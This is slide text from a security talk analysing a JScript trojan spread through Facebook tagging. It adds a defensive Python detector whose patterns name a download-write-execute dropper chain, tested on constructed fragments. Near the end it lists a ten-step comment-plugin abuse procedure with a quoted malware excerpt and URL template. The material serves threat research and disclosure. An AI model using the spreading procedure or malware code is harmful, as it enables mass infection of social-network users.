![Page 1: [CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland](https://reader036.vdocument.in/reader036/viewer/2022062401/587756d71a28ab84388b77bd/html5/thumbnails/1.jpg)
TAG ME IF YOU CAN
Ido Naor, Sr. Researcher, Kaspersky Lab. Tw: @idonaor1
Dani Goland, Founder & CEO, Undot. Tw: @danigoland
GReAT - Kaspersky Lab Elite Team Of Researchers
Global Research & Analysis Team, Since 2008
Threat Intelligence, research and innovation leadership
Focus: APTs, critical infrastructure threat, banking threats, sophisticated targeted attacks.
• A decade in security eco
• Manage regional research in Israel
• ExpertiZ
  • Malware analysis
  • Reverse Engineering
  • Penetration Testing
• HobbiZ: Responsible Disclosure
Undot – Uncovering Ideas
• Founder & CEO, Undot
• ExpertiZ
  • Full-Stack Developer
  • Entrepreneur
  • Data Science Freak
• HobbiZ: Organizing and competing in Hackathons
Undot experts with:
Control It – Remotes Unified! ~500K downloads
Front, Mobile, Back, Cloud
IN THE NEWS…
RECAP
MENTIONED BY A FRIEND
WINDOWS DESIGNATED
• File: comment_27734045.jse
• Language: JScript
• Size: ~5.31 KB
• MD5: 9D3DF2A89FDB7DA40CEB4DE02D605CFA
• SHA1: 6D658331FE6D7F684FEE384A29CE95F561A5C2EA

JScript is Microsoft's dialect of the ECMAScript standard[2] that is used in Microsoft's Internet Explorer. JScript is implemented as an Active Scripting engine, which means it can be "plugged in" to OLE Automation applications that support Active Scripting, such as Internet Explorer, Active Server Pages, and Windows Script Host.[3] It also means such applications can use multiple Active Scripting languages, e.g., JScript, VBScript or PerlScript.
GLIMPSE INTO THE JSE TROJAN
1) Domain name
2) Msxml2.XMLHTTP
3) ADODB.Stream
4) Wscript.Shell
5) JPG ext?
6) %AppData%
7) Autoit.exe
8) Manifest.json
9) Run.bat
10) Ping.js
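The COM objects and paths listed above form a download, write-to-%AppData%, execute chain that a defender can triage statically even when the script splits its strings. This added example (not code from the talk) folds simple string-concatenation obfuscation and then reports which stages of that chain a script contains; the two sample fragments are constructed for the demo and are not the real comment_27734045.jse.

```python
import re

# Indicators named on the slide, grouped by the stage each plays in the chain.
CHAIN = {
    "download":  r"msxml2\.(server)?xmlhttp",
    "write":     r"adodb\.stream",
    "drop_path": r"%appdata%",
    "disguise":  r"\.jpe?g\b",
    "execute":   r"wscript\.shell",
}

# Adjacent string literals joined with "+" (e.g. "Msx" + "ml2"), the simplest
# layer of the multi-layered JavaScript obfuscation the slides describe.
_CONCAT = re.compile(r'''(["'])([^"']*)\1\s*\+\s*(["'])([^"']*)\3''')

def fold_concat(src):
    """Repeatedly merge "a" + "b" into "ab" until no such pair remains."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src

def stages_present(src):
    """Return the set of chain stages whose indicator appears after folding."""
    folded = fold_concat(src).lower()
    return {stage for stage, rx in CHAIN.items() if re.search(rx, folded)}

def verdict(src):
    """Flag the full download->write->execute chain, not a lone WScript.Shell."""
    hit = stages_present(src)
    if {"download", "write", "execute"} <= hit:
        return "likely-dropper"
    if len(hit) >= 2:
        return "suspicious"
    return "clean"

# Constructed fragments for the demo; neither is the real comment_27734045.jse.
OBFUSCATED_FRAGMENT = r'''
var a = new ActiveXObject("Msx" + "ml2.XML" + "HTTP");
var b = new ActiveXObject("ADO" + "DB.Str" + "eam");
var p = "%App" + "Data%" + "\\photo.jpg";
var c = new ActiveXObject("WScr" + "ipt.Sh" + 'ell');
'''
BENIGN_ADMIN_SCRIPT = 'var sh = new ActiveXObject("WScript.Shell"); sh.Popup("Backup done");'

if __name__ == "__main__":
    for name, sample in [("obfuscated", OBFUSCATED_FRAGMENT), ("benign", BENIGN_ADMIN_SCRIPT)]:
        print(name, sorted(stages_present(sample)), verdict(sample))
```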
WHO IS REALLY AMONG US?
/Stats/history/pingjse3462
BACKGROUND CHECK
• Emerged: January 2015 on
• Turkish variables and comments in its files
• Threat actor: BePush/Killim
• Innovative techniques to spread malware through social networks
• Favor multi-layered obfuscation, mainly in JavaScript, and utilize multi-layered URL shorteners, third-party hosting providers and multi-stage payloads.
• Obfuscate their infrastructure using Cloudflare
INITIAL INFECTION
DYNAMIC ANALYSIS
CHROME EXTENSION AS A MITM
A HIDDEN VULNERABILITY?
THE MISSING PIECE
OBFUSCATED DROPPER
DEOBFUSCATION
ANTI-ANALYSIS
• Debugger;
ANTI-ANALYSIS
• Code hashes
GOOGLE TOKEN HIJACK
• Google URL Shortener
• Google Drive API
GOOGLE DRIVE AS A MALWARE HUB
VICTIM INFO STEALER
Dropper → Chrome Takeover → Malicious JS → Google Permissions → Uploading malware to storage → HERE
VICTIM INFO STEALER
VICTIM INFO STEALER
GOOGLE DRIVE PERMISSION MODIFICATION
CREATING MALICIOUS CALLERS
FACEBOOK TOKEN HIJACK
HOW TO FAIL SAFE
VULNERABILITY IN THE WILD
1) Initialize a request to the comment plugin
2) Get api_key & comment data
3) Create a comment on the plugin, containing a URL to Google Drive
4) The post is now published – get its ID
5) Create a new comment on the web platform
6) Inject the ID from the FB plugin into the web FB comment ID
7) Notification generated
8) FB debug check
9) Set privacy to public
10) Set comment text to null, deleting the traces.

```js
this.commentData["share_id"] = globalFunction["between"]('"commentIDs":["', '"', f["responseText"])["split"]("_")[1]; // 400539608410_10153962897128411

post_params = {
    "ft_ent_identifier": this["commentData"]["share_id"],   // ← injection!!
    "comment_text": gF["chain"](10)["toLowerCase"](),
    "source": 21,
    "client_id": Date["now"]() + ":" + Math["floor"](U2e[F](Date["now"](), 1000)),
    "session_id": globalFunction["chain"](8)["toLowerCase"](),
    "comment_text": "Array of tagged friends"
}

url: "https://www.facebook.com/ufi/add/comment/?dpr=1",
type: "POST",
async: true,
headers: { "content-type": "application/x-www-form-urlencoded" }
```
www.facebook.com/plugins/feedback.php?api_key=<ID>&href=https://<GOOGLE_DRIVE>/<JSE_FILE>
ALL IN ALL
QUESTIONS?
THANK YOU!
Follow us on Twitter: @IdoNaor1 @DaniGoland